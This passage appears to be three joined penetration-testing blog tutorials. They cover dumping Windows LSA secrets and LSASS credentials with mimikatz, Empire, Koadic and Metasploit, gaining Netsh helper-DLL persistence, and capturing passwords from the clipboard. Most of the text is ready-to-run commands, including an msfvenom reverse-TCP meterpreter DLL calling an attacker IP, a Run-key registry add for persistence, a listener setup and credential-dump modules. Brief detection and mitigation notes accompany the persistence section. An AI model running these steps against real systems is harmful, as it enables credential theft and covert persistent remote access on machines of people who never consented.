The LSA secrets are held in the Registry. If services are run as local or domain user, their passwords are stored in the Registry. If auto-logon is activated, it will also store this information in the Registry.

This can be done also done locally by changing permission values inside the registry. Navigate to Computer\HKEY_LOCAL_MACHINE\SECURITY.

Expand the SECURITY folder and choose permissions from inside the list.

Allow “Full Control” to the Administrator user as shown.

As you can observe that this time, we are able to fetch sub-folders under Security directories.

So, once you run the following command again, you can see the credential in the plain text as shown.

privilege::debug
lsadump::secrets

Method 5: Save privilege File of the Registry

Similarly, you can use another approach that will also operate in the same direction. Save system and security registry values with the help of the following command.

reg save HKLM\SYSTEM system
reg save HKLM\security security

As you can see if you use  the “lsa::secrets” command without a specified argument, you will not be able to retrieve the password, but if you enter the path for the file described above, mimikatz will dump the password in plain text.

privilege::debug
lsadump::secrets/system:c:\system /security:c:\security

PowerShell Empire

Empire is one of the good Penetration Testing Framework that works like as Metasploit, you can download it from GitHub and install in your attacking machine in order to launch attack remotely.

This is a post exploit, thus first you need to be compromised the host machine and then use the following module for LSA secrets dumps

usemodule credentials/mimikatz/lsadump
execute

As a result, it dumps password hashes saved as shown in the given image.

Koadic

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. It allows the attacker to run comsvcs.dll that will call the minidump and fetch the dump of lsass.exe to retrieve stored NTLM hashes. Read more from here

use comsvcs_lsass

As a result, it dumped the password hashes saved as shown in the given image.

Metasploit

Method1: Load kiwi

As we all know Metasploit is like the Swiss Knife, it comes with multiple modules thus it allows the attacker to execute mimikatz remotely and extract the Lsass dump to fetch the credentials. Since it is a post-exploitation thus you should have meterpreter session of the host machine at Initial Phase and then load kiwi in order to initialise mimikatz and execute the command.

load kiwi
lsa_dump_secrets

Method2: Load powershell

Similarly, you can also load PowerShell in the place of kiwi and perform the same operation, here we are using PowerShell script of mimikatz. This can be done by executing the following commands:

load powershell
powershell_import /root/powershell/Invoke-Mimikatz.ps1
sekurlsa::logonpasswords

This will be dumping the password hashes as shown in the below image.

Conclusion: In this post, you learned about Windows LSA Protection and its working along with its multiple techniques to exploit in context to get clear text password or hashes. Most of the attacks replaced the original lsass.exe from malware lsass.exe to make deceive the security monitors.

Reference:

Credentials Processes In Windows Authentication

LSA Policy Objects

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Credential Dumping: Local Security Authority (LSA|LSASS.EXE) appeared first on Hacking Articles.

In this article, we are going to describe the ability of the Netsh process to provide persistent access to the Target Machine.

Table of Content

• Introduction
• Configurations used in Practical
• Crafting Payload
• Payload Transfer
• Twerking Registry
• Listener Configuration & Gaining Persistence
• Detection
• Mitigation

Introduction

Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh also provides a scripting feature that allows you to run a group of commands in batch mode against a specified computer. Netsh can also save a configuration script in a text file for archival purposes or to help you configure other servers.

Netsh contains functionality to add helper DLLs for extending the functionality of the utility. The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.

Before we move on to gaining the persistence on the system, keep in mind that we have already compromised the system using well-known methods. Read about them here.

Configurations used in Practical

Attacker:

• OS: Kali Linux 2020.1
• IP:168.1.112

Target:

• OS: Windows 10
• IP:168.1.104

Crafting Payload

From the Introduction, it is clear that the Netsh helper can execute DLL files. So, if we are planning on using the netsh to compromise the Target Machine and gain a persistence shell, we will be needing a malicious DLL file. We used the msfvenom for creating the payload. The System that we compromised using other methods was an x64 bit version. This is easier to find for the systeminfo command.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.112 lport=1234 -f dll > raj.dll

Payload Transfer

Since we already have a meterpreter on the target system, we need to transfer the payload we crafted to the Target Machine. We are transferring the payload to the System32 directory as almost all of the DLL files are stored there. This is merely a way to hide into plain sight but, it requires the elevated privileges on the Target Machine. We can store the malicious DLL file at some other location as well all we will need is to twerk the location of the file while adding it in the registry. Back to the transfer of the payload. We used the upload command of the meterpreter for the transfer.

cd System32
upload /root/raj.dll .

Twerking Registry

We have successfully transferred the payload to the Target Machine. Now we need to pop up the Windows shell and make changes in the registry to include the file name in the Run and use the add helper command to load the DLL in the system.

shell
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v raj /t REG_SZ /d "C:\Windows\System32\netsh"
netsh add helper raj.dll

Listener Configuration & Gaining Persistence

Before moving to the Target System, we created a multi/handler listener with some configurations that we used while crafting the payload and we kept it ready for when the payload gets executed on the Target Machine resulting in a persistence shell.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.112
set lport 1234
exploit
sysinfo

The shell was generated in the netsh instance in no time. Let’s take a look at the changes we made in the registry to gain this persistence.

Detection

We made a key in the Run Hive with the name “raj” which contains the location of the netsh executable. This will run the netsh service on the Target Machine. As netsh is a pretty common service in the Server or Work Environment used by the System Administrator it is never suspecting for its entry in the Run.

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Now we move to another location in the registry. When we run the add helper command in the netsh a registry key is created with the same name as the DLL. This can be seen at this location in the registry.

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh

Mitigation

• Occasionally scan the registry at the following locations:
  • Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh
• Keep an eye out for registry changes made using any kind of shell (WMIC, Command Prompt, PowerShell)

That’s all for netsh persistence. No service is safe. Keep an eye out for all kinds of services even those which seem harmless.

Using Netsh

NetShell Helpers

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

The post Windows Persistence using Netsh appeared first on Hacking Articles.

In this article, we learn about online password mangers and dumping the credentials from such managers via clipboard. Passwords are not easy to remember especially when passwords are made up of alphanumeric and special characters. And these days, there are passwords for everything. And keeping the same password for every account is insecure. Therefore, we have many password managers such as KeePass, bitswarden and many others that help us save all of our passwords.

Table of Content:

• PowerShell Empire
• Metasploit Framework
• Kodiac

In our practical, we have used bitswarden password manager to keep our password secure. It’s feasible to use and even if we forget our password, we can just copy it from there and paste it where we require it. As you can see in the image below, we have saved our password in bitswarden. And we copy it from there.

PowerShell Empire

If these credentials are copied by someone then we can retrieve them by using various methods. PowerShell Empire has such a module; after having a session through the empire, use the following commands to execute the module:

usemodule collection/clipboard_monitor
execute

Once the module is executed, whenever the copied password is pasted as shown in the image below:

Then those credentials will be displayed in the console as shown in the image below:

Meterpreter Framework

In Metasploit, when you have a meterpreter session, it provides you with a different set of commands. One of those commands is load extapi, this command opens a door to various features of meterpreter session. All of these features can be viewed using a question mark (?). One feature of extapi is clipboard management commands. We will use a clipboard management command through extapi to dump the credentials which can be copied to clipboard. For this, type:

load extapi
clipboard_monitor_start

And as you can see in the image above, we have username and password through clipboard management command.

Koadic

Just like PowerShell empire, Kodiac has an inbuilt module for dumping the clipboard data. Once you have a session in koadic, type the following commands to get the clipboard data:

use clipboard
execute

And this way, again, we have the credentials.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Credential Dumping: Clipboard appeared first on Hacking Articles.